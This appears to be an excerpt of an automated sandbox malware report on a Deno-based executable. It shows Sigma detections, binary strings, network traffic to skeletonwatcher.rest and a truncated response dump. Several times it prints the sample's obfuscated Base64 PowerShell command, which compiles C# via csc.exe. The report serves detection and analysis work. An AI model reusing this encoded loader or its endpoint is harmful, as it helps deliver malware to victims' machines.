wAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0
      Sigma detected: Dynamic .NET Compilation Via Csc.EXE
      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSA
      Sigma detected: Suspicious Execution of Powershell with Base64
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0
      Sigma detected: Dynamic CSharp Compile Artefact
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5652, TargetFilename: C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0

      Data Obfuscation

      barindex
      Sigma detected: Dot net compiler compiles file from suspicious location
      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSA

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results
      Source: dGhlYXB0Z3JvdXA=-free.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: 8C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.pdbhP source: powershell.exe, 00000007.00000002.2268510659.000001C3815D6000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: D:\a\deno\deno\target\release\deps\deno.pdb source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF6773EE000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: *on.pdb; source: powershell.exe, 00000003.00000002.2264583068.00000254D0FFE000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb28 source: powershell.exe, 00000003.00000002.2264583068.00000254D0FD4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbT source: powershell.exe, 00000003.00000002.2265232590.00000254D12FF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb9 source: powershell.exe, 00000003.00000002.2265232590.00000254D12D0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb source: powershell.exe, 00000003.00000002.2264583068.00000254D0FD4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2327769536.000001C3F3122000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbt source: powershell.exe, 00000007.00000002.2328766048.000001C3F3380000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 8C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.pdb source: powershell.exe, 00000007.00000002.2268510659.000001C3815D6000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 8C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.pdb source: powershell.exe, 00000003.00000002.2234723049.00000254BA357000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: tion.pdb source: powershell.exe, 00000003.00000002.2263615074.00000254D0F65000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2265232590.00000254D12FF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2328766048.000001C3F3380000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 6?ystem.Core.pdb.# source: powershell.exe, 00000003.00000002.2263615074.00000254D0F65000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb' source: powershell.exe, 00000007.00000002.2328766048.000001C3F3380000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 8C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.pdbhP source: powershell.exe, 00000003.00000002.2234723049.00000254BA357000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000007.00000002.2327416942.000001C3F30DE000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: re.pdb source: powershell.exe, 00000003.00000002.2263615074.00000254D0F65000.00000004.00000020.00020000.00000000.sdmp
      Source: global trafficTCP traffic: 192.168.2.5:49208 -> 1.1.1.1:53
      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
      Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
      Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /api/get/free HTTP/1.1accept: */*user-agent: Deno/1.6.3accept-encoding: gzip, brhost: skeletonwatcher.rest
      Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
      Source: global trafficDNS traffic detected: DNS query: skeletonwatcher.rest
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 02 Jan 2025 07:59:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Thu, 02 Jan 2025 07:59:52 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WxwCcR3duDu6tb7BHuiskrOr339PyGUN5chm%2Fr8RL3EUM23nSHRZRAzoEk4JRIDG%2F1%2B62bbxsxFFFK9ZT8Hk0AP4%2FTJVzQORMNfQmdXDM2yle%2FY39nglQByKRxzQcjnu1x4Al2t25Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 8fb935f5dce7f795-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1402&min_rtt=1402&rtt_var=701&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=122&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f dc b8 11 fe be bf 62 ac 02 f6 2e b0 94 ec bc 5c 1c 5b ab e2 9a b8 80 81 14 97 5e 1c b4 c1 21 30 28 72 b4 e2 99 22 55 92 5a 79 e1 fa bf 17 14 a5 b5 f6 c5 be 06 2d 60 c0 a2 38 7c 66 f8 cc 33 23 72 d3 a3 8f bf 7c b8 f9 f6 f9 0a 4a 57 c9 6c 92 1e 11 f2 9b 28 40 3a b8 be 82 77 df 33 48 fd 04 30 49 ad 5d 44 4a 93 df 2d 08 fc 09 b4 e4 02 23 90 54 2d 17 11 2a f2 f5 4b 94 41 7a f4 1b 2a 2e 8a ef 84 3c 41 f5 38 00 87 a1 de fd 18 d4 f9 0b 50 e7 3f 00 b5 74 3d 9a 7f 71 68 97 fb 28 84 6c 23 95 48 79 36 49 9d 70 12 b3 9f 9d 43 e5 84 56 f0 2b fe ab 11 06 f9 11 fc 1b 3e 48 dd f0 42 52 83 69 12 ec 26 69 85 8e 02 2b a9 b1 e8 16 d1 d7 9b bf 92 f3 08 92 61 a2 74 ae 26 1e 61 b5 88 3e 68 e5 41 c9 cd ba c6 08 58 18 2d 22 87 f7 2e f1 f1 5e 6e 60 5e 42 f9 27 f9 fa 33 f9 a0 ab 9a 3a 91 cb 31 d0 f5 d5 e2 8a 2f 71 b4 4e Data Ascii: 